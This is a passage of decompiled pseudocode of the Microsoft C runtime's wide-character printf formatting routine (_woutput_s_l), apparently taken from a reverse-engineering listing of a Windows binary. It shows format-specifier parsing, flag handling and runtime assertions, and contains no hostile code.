    													while(1) {
    														L187:
    														while(1) {
    															L187:
    															while(1) {
    																L187:
    																while(1) {
    																	do {
    																		L187:
    																		if( *((intOrPtr*)(_t672 - 0x28)) != 0) {
    																			L212:
    																			if( *(_t672 - 0x20) != 0) {
    																				L00B7EB20( *(_t672 - 0x20), 2);
    																				_t675 = _t675 + 8;
    																				 *(_t672 - 0x20) = 0;
    																			}
    																			while(1) {
    																				L214:
    																				 *(_t672 - 0x454) =  *((intOrPtr*)( *((intOrPtr*)(_t672 + 0xc))));
    																				_t578 =  *(_t672 - 0x454) & 0x0000ffff;
    																				 *((intOrPtr*)(_t672 + 0xc)) =  *((intOrPtr*)(_t672 + 0xc)) + 2;
    																				if(( *(_t672 - 0x454) & 0x0000ffff) == 0 ||  *(_t672 - 0x44c) < 0) {
    																					break;
    																				} else {
    																					if(( *(_t672 - 0x454) & 0x0000ffff) < 0x20 || ( *(_t672 - 0x454) & 0x0000ffff) > 0x78) {
    																						 *(_t672 - 0x4d8) = 0;
    																					} else {
    																						 *(_t672 - 0x4d8) =  *(( *(_t672 - 0x454) & 0x0000ffff) +  &M00B77B58) & 0xf;
    																					}
    																				}
    																				L7:
    																				 *(_t672 - 0x450) =  *(_t672 - 0x4d8);
    																				_t642 =  *(_t672 - 0x450) * 9;
    																				_t509 =  *(_t672 - 0x45c);
    																				_t586 = ( *(_t642 + _t509 + 0xb77b78) & 0x000000ff) >> 4;
    																				 *(_t672 - 0x45c) = ( *(_t642 + _t509 + 0xb77b78) & 0x000000ff) >> 4;
    																				if( *(_t672 - 0x45c) != 8) {
    																					L16:
    																					 *(_t672 - 0x4e0) =  *(_t672 - 0x45c);
    																					if( *(_t672 - 0x4e0) > 7) {
    																						continue;
    																					}
    																					L17:
    																					switch( *((intOrPtr*)( *(_t672 - 0x4e0) * 4 +  &M00B97044))) {
    																						case 0:
    																							L18:
    																							 *(_t672 - 0xc) = 1;
    																							E00B97150( *(_t672 - 0x454) & 0x0000ffff,  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
    																							_t675 = _t675 + 0xc;
    																							goto L214;
    																						case 1:
    																							L19:
    																							 *(__ebp - 0x2c) = 0;
    																							__ecx =  *(__ebp - 0x2c);
    																							 *(__ebp - 0x28) = __ecx;
    																							__edx =  *(__ebp - 0x28);
    																							 *(__ebp - 0x18) =  *(__ebp - 0x28);
    																							__eax =  *(__ebp - 0x18);
    																							 *(__ebp - 0x1c) =  *(__ebp - 0x18);
    																							 *(__ebp - 0x10) = 0;
    																							 *(__ebp - 0x30) = 0xffffffff;
    																							 *(__ebp - 0xc) = 0;
    																							goto L214;
    																						case 2:
    																							L20:
    																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																							 *(__ebp - 0x4e4) = __ecx;
    																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    																							 *(__ebp - 0x4e4) =  *(__ebp - 0x4e4) - 0x20;
    																							if( *(__ebp - 0x4e4) > 0x10) {
    																								goto L27;
    																							}
    																							L21:
    																							_t57 =  *(__ebp - 0x4e4) + 0xb9707c; // 0x498d04
    																							__ecx =  *_t57 & 0x000000ff;
    																							switch( *((intOrPtr*)(__ecx * 4 +  &M00B97064))) {
    																								case 0:
    																									goto L24;
    																								case 1:
    																									goto L25;
    																								case 2:
    																									goto L23;
    																								case 3:
    																									goto L22;
    																								case 4:
    																									goto L26;
    																								case 5:
    																									goto L27;
    																							}
    																						case 3:
    																							L28:
    																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    																								 *(__ebp - 0x18) =  *(__ebp - 0x18) * 0xa;
    																								_t81 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    																								__ecx =  *(__ebp - 0x18) * 0xa + _t81;
    																								 *(__ebp - 0x18) = __ecx;
    																							} else {
    																								__edx = __ebp + 0x14;
    																								 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    																								if( *(__ebp - 0x18) < 0) {
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																									__ecx =  *(__ebp - 0x18);
    																									__ecx =  ~( *(__ebp - 0x18));
    																									 *(__ebp - 0x18) = __ecx;
    																								}
    																							}
    																							goto L214;
    																						case 4:
    																							L34:
    																							 *(__ebp - 0x30) = 0;
    																							goto L214;
    																						case 5:
    																							L35:
    																							__edx =  *(__ebp - 0x454) & 0x0000ffff;
    																							if(( *(__ebp - 0x454) & 0x0000ffff) != 0x2a) {
    																								__ecx =  *(__ebp - 0x30);
    																								__ecx =  *(__ebp - 0x30) * 0xa;
    																								_t92 = ( *(__ebp - 0x454) & 0x0000ffff) - 0x30; // -48
    																								__eax = __ecx + _t92;
    																								 *(__ebp - 0x30) = __ecx + _t92;
    																							} else {
    																								__eax = __ebp + 0x14;
    																								 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    																								if( *(__ebp - 0x30) < 0) {
    																									 *(__ebp - 0x30) = 0xffffffff;
    																								}
    																							}
    																							goto L214;
    																						case 6:
    																							L41:
    																							__ecx =  *(__ebp - 0x454) & 0x0000ffff;
    																							 *(__ebp - 0x4e8) = __ecx;
    																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    																							 *(__ebp - 0x4e8) =  *(__ebp - 0x4e8) - 0x49;
    																							if( *(__ebp - 0x4e8) > 0x2e) {
    																								L64:
    																								goto L214;
    																							}
    																							L42:
    																							_t100 =  *(__ebp - 0x4e8) + 0xb970a4; // 0x68b19003
    																							__ecx =  *_t100 & 0x000000ff;
    																							switch( *((intOrPtr*)(__ecx * 4 +  &M00B97090))) {
    																								case 0:
    																									L47:
    																									__ecx =  *(__ebp + 0xc);
    																									__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x36) {
    																										L50:
    																										__ecx =  *(__ebp + 0xc);
    																										__edx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																										if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x33) {
    																											L53:
    																											__ecx =  *(__ebp + 0xc);
    																											__edx =  *__ecx & 0x0000ffff;
    																											if(( *__ecx & 0x0000ffff) == 0x64) {
    																												L59:
    																												L61:
    																												goto L64;
    																											}
    																											L54:
    																											__eax =  *(__ebp + 0xc);
    																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																											if(__ecx == 0x69) {
    																												goto L59;
    																											}
    																											L55:
    																											__edx =  *(__ebp + 0xc);
    																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) == 0x6f) {
    																												goto L59;
    																											}
    																											L56:
    																											__ecx =  *(__ebp + 0xc);
    																											__edx =  *__ecx & 0x0000ffff;
    																											if(( *__ecx & 0x0000ffff) == 0x75) {
    																												goto L59;
    																											}
    																											L57:
    																											__eax =  *(__ebp + 0xc);
    																											__ecx =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																											if(__ecx == 0x78) {
    																												goto L59;
    																											}
    																											L58:
    																											__edx =  *(__ebp + 0xc);
    																											__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																											if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x58) {
    																												 *(__ebp - 0x45c) = 0;
    																												goto L18;
    																											}
    																											goto L59;
    																										}
    																										L51:
    																										__eax =  *(__ebp + 0xc);
    																										__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    																										if(__ecx != 0x32) {
    																											goto L53;
    																										} else {
    																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																											 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    																											 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xffff7fff;
    																											goto L61;
    																										}
    																									}
    																									L48:
    																									__eax =  *(__ebp + 0xc);
    																									__ecx =  *( *(__ebp + 0xc) + 2) & 0x0000ffff;
    																									if(__ecx != 0x34) {
    																										goto L50;
    																									} else {
    																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00008000;
    																										goto L61;
    																									}
    																								case 1:
    																									L62:
    																									__ecx =  *(__ebp - 0x10);
    																									__ecx =  *(__ebp - 0x10) | 0x00000020;
    																									 *(__ebp - 0x10) = __ecx;
    																									goto L64;
    																								case 2:
    																									L43:
    																									__edx =  *(__ebp + 0xc);
    																									__eax =  *( *(__ebp + 0xc)) & 0x0000ffff;
    																									if(( *( *(__ebp + 0xc)) & 0x0000ffff) != 0x6c) {
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000010;
    																									} else {
    																										__ecx =  *(__ebp + 0xc);
    																										__ecx =  *(__ebp + 0xc) + 2;
    																										 *(__ebp + 0xc) = __ecx;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    																									}
    																									goto L64;
    																								case 3:
    																									L63:
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
    																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
    																									goto L64;
    																								case 4:
    																									goto L64;
    																							}
    																						case 7:
    																							goto L65;
    																						case 8:
    																							L24:
    																							__ecx =  *(__ebp - 0x10);
    																							__ecx =  *(__ebp - 0x10) | 0x00000002;
    																							 *(__ebp - 0x10) = __ecx;
    																							goto L27;
    																						case 9:
    																							L25:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    																							goto L27;
    																						case 0xa:
    																							L23:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    																							goto L27;
    																						case 0xb:
    																							L22:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    																							goto L27;
    																						case 0xc:
    																							L26:
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
    																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000008;
    																							goto L27;
    																						case 0xd:
    																							L27:
    																							goto L214;
    																					}
    																				} else {
    																					_t640 = 0;
    																					if(0 == 0) {
    																						 *(_t672 - 0x4dc) = 0;
    																					} else {
    																						 *(_t672 - 0x4dc) = 1;
    																					}
    																					 *(_t672 - 0x46c) =  *(_t672 - 0x4dc);
    																					if( *(_t672 - 0x46c) == 0) {
    																						_push( &M00B77C38);
    																						_push(0);
    																						_push(0x460);
    																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																						_push(2);
    																						_t517 = L00B7D760();
    																						_t675 = _t675 + 0x14;
    																						if(_t517 == 1) {
    																							asm("int3");
    																						}
    																					}
    																					L14:
    																					if( *(_t672 - 0x46c) != 0) {
    																						goto L16;
    																					} else {
    																						 *((intOrPtr*)(L00B80C60(_t586))) = 0x16;
    																						E00B809F0(_t565, _t586, _t670, _t671,  &M00B77C38, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    																						 *(_t672 - 0x4c8) = 0xffffffff;
    																						E00B7C650(_t672 - 0x40);
    																						_t502 =  *(_t672 - 0x4c8);
    																						L225:
    																						return E00B805D0(_t502, _t565,  *(_t672 - 0x48) ^ _t672, _t640, _t670, _t671);
    																					}
    																				}
    																			}
    																			L215:
    																			if( *(_t672 - 0x45c) == 0 ||  *(_t672 - 0x45c) == 7) {
    																				 *(_t672 - 0x4f8) = 1;
    																			} else {
    																				 *(_t672 - 0x4f8) = 0;
    																			}
    																			_t640 =  *(_t672 - 0x4f8);
    																			 *(_t672 - 0x4bc) =  *(_t672 - 0x4f8);
    																			if( *(_t672 - 0x4bc) == 0) {
    																				_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    																				_push(0);
    																				_push(0x8f5);
    																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																				_push(2);
    																				_t507 = L00B7D760();
    																				_t675 = _t675 + 0x14;
    																				if(_t507 == 1) {
    																					asm("int3");
    																				}
    																			}
    																			if( *(_t672 - 0x4bc) != 0) {
    																				 *(_t672 - 0x4d4) =  *(_t672 - 0x44c);
    																				E00B7C650(_t672 - 0x40);
    																				_t502 =  *(_t672 - 0x4d4);
    																			} else {
    																				 *((intOrPtr*)(L00B80C60(_t578))) = 0x16;
    																				E00B809F0(_t565, _t578, _t670, _t671, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    																				 *(_t672 - 0x4d0) = 0xffffffff;
    																				E00B7C650(_t672 - 0x40);
    																				_t502 =  *(_t672 - 0x4d0);
    																			}
    																			goto L225;
    																		}
    																		L188:
    																		if(( *(_t672 - 0x10) & 0x00000040) != 0) {
    																			if(( *(_t672 - 0x10) & 0x00000100) == 0) {
    																				if(( *(_t672 - 0x10) & 0x00000001) == 0) {
    																					if(( *(_t672 - 0x10) & 0x00000002) != 0) {
    																						 *((short*)(_t672 - 0x14)) = 0x20;
    																						 *(_t672 - 0x1c) = 1;
    																					}
    																				} else {
    																					 *((short*)(_t672 - 0x14)) = 0x2b;
    																					 *(_t672 - 0x1c) = 1;
    																				}
    																			} else {
    																				 *((short*)(_t672 - 0x14)) = 0x2d;
    																				 *(_t672 - 0x1c) = 1;
    																			}
    																		}
    																		 *((intOrPtr*)(_t672 - 0x4ac)) =  *((intOrPtr*)(_t672 - 0x18)) -  *((intOrPtr*)(_t672 - 0x24)) -  *(_t672 - 0x1c);
    																		if(( *(_t672 - 0x10) & 0x0000000c) == 0) {
    																			E00B971B0(0x20,  *((intOrPtr*)(_t672 - 0x4ac)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
    																			_t675 = _t675 + 0x10;
    																		}
    																		E00B971F0( *(_t672 - 0x1c), _t672 - 0x14,  *(_t672 - 0x1c),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
    																		_t675 = _t675 + 0x10;
    																		if(( *(_t672 - 0x10) & 0x00000008) != 0 && ( *(_t672 - 0x10) & 0x00000004) == 0) {
    																			E00B971B0(0x30,  *((intOrPtr*)(_t672 - 0x4ac)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
    																			_t675 = _t675 + 0x10;
    																		}
    																		if( *(_t672 - 0xc) != 0 ||  *((intOrPtr*)(_t672 - 0x24)) <= 0) {
    																			L208:
    																			E00B971F0( *((intOrPtr*)(_t672 - 0x24)),  *((intOrPtr*)(_t672 - 4)),  *((intOrPtr*)(_t672 - 0x24)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
    																			_t675 = _t675 + 0x10;
    																			goto L209;
    																		} else {
    																			L202:
    																			 *((intOrPtr*)(_t672 - 0x4b0)) =  *((intOrPtr*)(_t672 - 4));
    																			 *((intOrPtr*)(_t672 - 0x4b4)) =  *((intOrPtr*)(_t672 - 0x24));
    																			while(1) {
    																				L203:
    																				 *((intOrPtr*)(_t672 - 0x4b4)) =  *((intOrPtr*)(_t672 - 0x4b4)) - 1;
    																				if( *((intOrPtr*)(_t672 - 0x4b4)) <= 0) {
    																					break;
    																				}
    																				L204:
    																				_t535 = E00B7C680(_t672 - 0x40);
    																				_t539 = E00B90E50(_t672 - 0x458,  *((intOrPtr*)(_t672 - 0x4b0)),  *((intOrPtr*)( *((intOrPtr*)(E00B7C680(_t672 - 0x40))) + 0xac)), _t535);
    																				_t675 = _t675 + 0x10;
    																				 *((intOrPtr*)(_t672 - 0x4b8)) = _t539;
    																				if( *((intOrPtr*)(_t672 - 0x4b8)) > 0) {
    																					L206:
    																					E00B97150( *(_t672 - 0x458) & 0x0000ffff,  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
    																					_t675 = _t675 + 0xc;
    																					 *((intOrPtr*)(_t672 - 0x4b0)) =  *((intOrPtr*)(_t672 - 0x4b0)) +  *((intOrPtr*)(_t672 - 0x4b8));
    																					continue;
    																				}
    																				L205:
    																				 *(_t672 - 0x44c) = 0xffffffff;
    																				break;
    																			}
    																			L207:
    																			L209:
    																			if( *(_t672 - 0x44c) >= 0 && ( *(_t672 - 0x10) & 0x00000004) != 0) {
    																				E00B971B0(0x20,  *((intOrPtr*)(_t672 - 0x4ac)),  *((intOrPtr*)(_t672 + 8)), _t672 - 0x44c);
    																				_t675 = _t675 + 0x10;
    																			}
    																			goto L212;
    																		}
    																		L65:
    																		__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																		 *(__ebp - 0x4ec) =  *(__ebp - 0x454) & 0x0000ffff;
    																		__ecx =  *(__ebp - 0x4ec);
    																		__ecx =  *(__ebp - 0x4ec) - 0x41;
    																		 *(__ebp - 0x4ec) = __ecx;
    																	} while ( *(__ebp - 0x4ec) > 0x37);
    																	__edx =  *(__ebp - 0x4ec);
    																	_t141 = __edx + 0xb97110; // 0xcccccc0d
    																	__eax =  *_t141 & 0x000000ff;
    																	switch( *((intOrPtr*)(( *_t141 & 0x000000ff) * 4 +  &M00B970D4))) {
    																		case 0:
    																			L120:
    																			 *(__ebp - 0x2c) = 1;
    																			 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
    																			 *(__ebp - 0x454) = __ax;
    																			goto L121;
    																		case 1:
    																			L67:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																			}
    																			goto L69;
    																		case 2:
    																			L82:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    																			}
    																			goto L84;
    																		case 3:
    																			L143:
    																			 *((intOrPtr*)(__ebp - 0x460)) = 7;
    																			goto L145;
    																		case 4:
    																			L75:
    																			__eax = __ebp + 0x14;
    																			 *(__ebp - 0x474) = E00B93D50(__ebp + 0x14);
    																			if( *(__ebp - 0x474) == 0) {
    																				L77:
    																				__edx =  *0xd121a0; // 0xb775a0
    																				 *(__ebp - 4) = __edx;
    																				__eax =  *(__ebp - 4);
    																				 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																				L81:
    																				goto L187;
    																			}
    																			L76:
    																			__ecx =  *(__ebp - 0x474);
    																			if( *((intOrPtr*)( *(__ebp - 0x474) + 4)) != 0) {
    																				L78:
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    																					 *(__ebp - 0xc) = 0;
    																					__edx =  *(__ebp - 0x474);
    																					__eax =  *(__edx + 4);
    																					 *(__ebp - 4) =  *(__edx + 4);
    																					__ecx =  *(__ebp - 0x474);
    																					__edx =  *__ecx;
    																					 *(__ebp - 0x24) =  *__ecx;
    																				} else {
    																					__edx =  *(__ebp - 0x474);
    																					__eax =  *(__edx + 4);
    																					 *(__ebp - 4) =  *(__edx + 4);
    																					__ecx =  *(__ebp - 0x474);
    																					__eax =  *__ecx;
    																					asm("cdq");
    																					 *__ecx - __edx =  *__ecx - __edx >> 1;
    																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    																					 *(__ebp - 0xc) = 1;
    																				}
    																				goto L81;
    																			}
    																			goto L77;
    																		case 5:
    																			L121:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			__edx = __ebp - 0x448;
    																			 *(__ebp - 4) = __ebp - 0x448;
    																			 *(__ebp - 0x44) = 0x200;
    																			if( *(__ebp - 0x30) >= 0) {
    																				L123:
    																				if( *(__ebp - 0x30) != 0) {
    																					L126:
    																					if( *(__ebp - 0x30) > 0x200) {
    																						 *(__ebp - 0x30) = 0x200;
    																					}
    																					L128:
    																					if( *(__ebp - 0x30) > 0xa3) {
    																						__ecx =  *(__ebp - 0x30);
    																						__ecx =  *(__ebp - 0x30) + 0x15d;
    																						 *(__ebp - 0x20) = L00B7DEA0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																						if( *(__ebp - 0x20) == 0) {
    																							 *(__ebp - 0x30) = 0xa3;
    																						} else {
    																							__edx =  *(__ebp - 0x20);
    																							 *(__ebp - 4) =  *(__ebp - 0x20);
    																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																						}
    																					}
    																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    																					__edx =  *(__ebp + 0x14);
    																					__eax =  *(__edx - 8);
    																					__ecx =  *(__edx - 4);
    																					 *(__ebp - 0x490) =  *(__edx - 8);
    																					 *(__ebp - 0x48c) =  *(__edx - 4);
    																					__ecx = __ebp - 0x40;
    																					_push(E00B7C680(__ebp - 0x40));
    																					__edx =  *(__ebp - 0x2c);
    																					_push( *(__ebp - 0x2c));
    																					__eax =  *(__ebp - 0x30);
    																					_push( *(__ebp - 0x30));
    																					__ecx =  *(__ebp - 0x454);
    																					_push( *(__ebp - 0x454));
    																					__edx =  *(__ebp - 0x44);
    																					_push( *(__ebp - 0x44));
    																					__eax =  *(__ebp - 4);
    																					_push( *(__ebp - 4));
    																					__ecx = __ebp - 0x490;
    																					_push(__ebp - 0x490);
    																					__edx =  *0xd12188; // 0xddc09d6c
    																					E00B849C0(__edx) =  *__eax();
    																					__esp = __esp + 0x1c;
    																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																					if(( *(__ebp - 0x10) & 0x00000080) != 0 &&  *(__ebp - 0x30) == 0) {
    																						__ecx = __ebp - 0x40;
    																						_push(E00B7C680(__ebp - 0x40));
    																						__ecx =  *(__ebp - 4);
    																						_push( *(__ebp - 4));
    																						__edx =  *0xd12194; // 0xddc09d6c
    																						E00B849C0(__edx) =  *__eax();
    																						__esp = __esp + 8;
    																					}
    																					__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																					if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																							__ecx = __ebp - 0x40;
    																							_push(E00B7C680(__ebp - 0x40));
    																							__edx =  *(__ebp - 4);
    																							_push( *(__ebp - 4));
    																							__eax =  *0xd12190; // 0xddc09d6c
    																							__eax =  *__eax();
    																							__esp = __esp + 8;
    																						}
    																					}
    																					__ecx =  *(__ebp - 4);
    																					__edx =  *( *(__ebp - 4));
    																					if( *( *(__ebp - 4)) == 0x2d) {
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
    																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
    																					}
    																					__edx =  *(__ebp - 4);
    																					 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    																					goto L187;
    																				}
    																				L124:
    																				__eax =  *(__ebp - 0x454) & 0x0000ffff;
    																				if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
    																					goto L126;
    																				}
    																				L125:
    																				 *(__ebp - 0x30) = 1;
    																				goto L128;
    																			}
    																			L122:
    																			 *(__ebp - 0x30) = 6;
    																			goto L128;
    																		case 6:
    																			L69:
    																			 *(__ebp - 0xc) = 1;
    																			__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    																			 *(__ebp - 0x458) = __ax;
    																			__ecx =  *(__ebp - 0x10);
    																			__ecx =  *(__ebp - 0x10) & 0x00000020;
    																			if(__ecx == 0) {
    																				 *(__ebp - 0x448) =  *(__ebp - 0x458);
    																			} else {
    																				 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
    																				 *(__ebp - 0x470) = __dl;
    																				 *((char*)(__ebp - 0x46f)) = 0;
    																				__ecx = __ebp - 0x40;
    																				__eax = E00B7C680(__ebp - 0x40);
    																				__ecx = __ebp - 0x40;
    																				E00B7C680(__ebp - 0x40) =  *__eax;
    																				__ecx =  *(__ebp - 0x448 + 0xac);
    																				__edx = __ebp - 0x470;
    																				__eax = __ebp - 0x448;
    																				if(E00B90E50(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448) < 0) {
    																					 *(__ebp - 0x28) = 1;
    																				}
    																			}
    																			__edx = __ebp - 0x448;
    																			 *(__ebp - 4) = __ebp - 0x448;
    																			 *(__ebp - 0x24) = 1;
    																			goto L187;
    																		case 7:
    																			L141:
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    																			 *(__ebp - 8) = 0xa;
    																			goto L150;
    																		case 8:
    																			L106:
    																			__eax = __ebp + 0x14;
    																			 *(__ebp - 0x484) = E00B93D50(__ebp + 0x14);
    																			if(E00B97280() != 0) {
    																				L116:
    																				__ecx =  *(__ebp - 0x10);
    																				__ecx =  *(__ebp - 0x10) & 0x00000020;
    																				if(__ecx == 0) {
    																					__ecx =  *(__ebp - 0x484);
    																					__edx =  *(__ebp - 0x44c);
    																					 *__ecx =  *(__ebp - 0x44c);
    																				} else {
    																					__edx =  *(__ebp - 0x484);
    																					__ax =  *(__ebp - 0x44c);
    																					 *( *(__ebp - 0x484)) = __ax;
    																				}
    																				 *(__ebp - 0x28) = 1;
    																				goto L187;
    																			}
    																			L107:
    																			__ecx = 0;
    																			if(0 == 0) {
    																				 *(__ebp - 0x4f4) = 0;
    																			} else {
    																				 *(__ebp - 0x4f4) = 1;
    																			}
    																			__edx =  *(__ebp - 0x4f4);
    																			 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
    																			if( *(__ebp - 0x488) == 0) {
    																				_push(L"(\"\'n\' format specifier disabled\", 0)");
    																				_push(0);
    																				_push(0x695);
    																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    																				_push(2);
    																				__eax = L00B7D760();
    																				__esp = __esp + 0x14;
    																				if(__eax == 1) {
    																					asm("int3");
    																				}
    																			}
    																			if( *(__ebp - 0x488) != 0) {
    																				L115:
    																				goto L187;
    																			} else {
    																				L114:
    																				 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    																				__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    																				 *(__ebp - 0x4cc) = 0xffffffff;
    																				__ecx = __ebp - 0x40;
    																				__eax = E00B7C650(__ecx);
    																				__eax =  *(__ebp - 0x4cc);
    																				goto L225;
    																			}
    																		case 9:
    																			L148:
    																			 *(__ebp - 8) = 8;
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
    																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
    																			}
    																			goto L150;
    																		case 0xa:
    																			L142:
    																			 *(__ebp - 0x30) = 8;
    																			goto L143;
    																		case 0xb:
    																			L84:
    																			if( *(__ebp - 0x30) != 0xffffffff) {
    																				__edx =  *(__ebp - 0x30);
    																				 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
    																			} else {
    																				 *(__ebp - 0x4f0) = 0x7fffffff;
    																			}
    																			__eax =  *(__ebp - 0x4f0);
    																			 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
    																			__ecx = __ebp + 0x14;
    																			 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    																			if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																				L98:
    																				if( *(__ebp - 4) == 0) {
    																					__ecx =  *0xd121a4; // 0xb77590
    																					 *(__ebp - 4) = __ecx;
    																				}
    																				 *(__ebp - 0xc) = 1;
    																				__edx =  *(__ebp - 4);
    																				 *(__ebp - 0x480) =  *(__ebp - 4);
    																				while(1) {
    																					L101:
    																					__eax =  *(__ebp - 0x47c);
    																					__ecx =  *(__ebp - 0x47c);
    																					__ecx =  *(__ebp - 0x47c) - 1;
    																					 *(__ebp - 0x47c) = __ecx;
    																					if( *(__ebp - 0x47c) == 0) {
    																						break;
